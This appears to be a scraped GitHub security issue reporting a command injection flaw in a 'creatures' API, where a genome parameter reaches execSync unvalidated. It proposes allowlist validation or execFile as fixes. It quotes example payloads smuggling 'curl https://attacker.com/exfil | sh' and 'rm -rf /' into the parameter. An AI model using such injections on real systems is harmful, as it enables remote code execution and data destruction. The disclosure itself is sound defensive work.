You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The POST /api/creatures endpoint accepts a genome parameter from the request body and passes it, without validation, into shell commands via execSync string interpolation. This is a command injection vulnerability.
parseGenomeSource() constructs a GitHub URL from the genome name but the URL itself goes directly into a shell command. A genome source like:
https://github.com/x/y.git; curl https://attacker.com/exfil | sh #
would execute arbitrary commands on the host. The subdir path from a 3-part source (e.g. user/repo/path; rm -rf /) also flows into git sparse-checkout set ${subdir} unquoted.
src/host/index.ts — POST /api/creatures: line 671 (no validation on genome)
Fix
Two options:
Validate before use: Reject any genome source that doesn't match a safe allowlist pattern (e.g. ^[a-z0-9][a-z0-9/_-]*$ for shorthand names, explicit URL validation for https:// sources).
Option 2 is cleaner. git accepts arguments as an array just fine.
Severity
Medium-High. Requires access to the creature control API, which currently has no authentication (see #12). If/when token auth lands (#16), the exploit surface shrinks to compromised tokens. Either way, this should be fixed — defense in depth.
Already fixed
name parameter: validated with ^[a-z0-9][a-z0-9-]*$ regex — good.
Summary
The
POST /api/creaturesendpoint accepts agenomeparameter from the request body and passes it, without validation, into shell commands viaexecSyncstring interpolation. This is a command injection vulnerability.Call chain
parseGenomeSource()constructs a GitHub URL from the genome name but the URL itself goes directly into a shell command. A genome source like:would execute arbitrary commands on the host. The
subdirpath from a 3-part source (e.g.user/repo/path; rm -rf /) also flows intogit sparse-checkout set ${subdir}unquoted.Affected files
src/shared/paths.ts—autoInstallGenome(): lines 99, 100, 109src/cli/genome.ts—genomeInstall(): lines 51, 52, 57 (same pattern, but CLI-only — lower severity)src/host/index.ts—POST /api/creatures: line 671 (no validation ongenome)Fix
Two options:
Validate before use: Reject any genome source that doesn't match a safe allowlist pattern (e.g.
^[a-z0-9][a-z0-9/_-]*$for shorthand names, explicit URL validation for https:// sources).Use
execFileinstead ofexecSync: Pass arguments as an array so the shell never interprets them. Already done for the validate command in security: prevent container escape via BIRTH.json validate command #64 — apply the same approach here.Option 2 is cleaner.
gitaccepts arguments as an array just fine.Severity
Medium-High. Requires access to the creature control API, which currently has no authentication (see #12). If/when token auth lands (#16), the exploit surface shrinks to compromised tokens. Either way, this should be fixed — defense in depth.
Already fixed
nameparameter: validated with^[a-z0-9][a-z0-9-]*$regex — good.validatecommand in genome.json: fixed to useexecFilein PR security: prevent container escape via BIRTH.json validate command #64.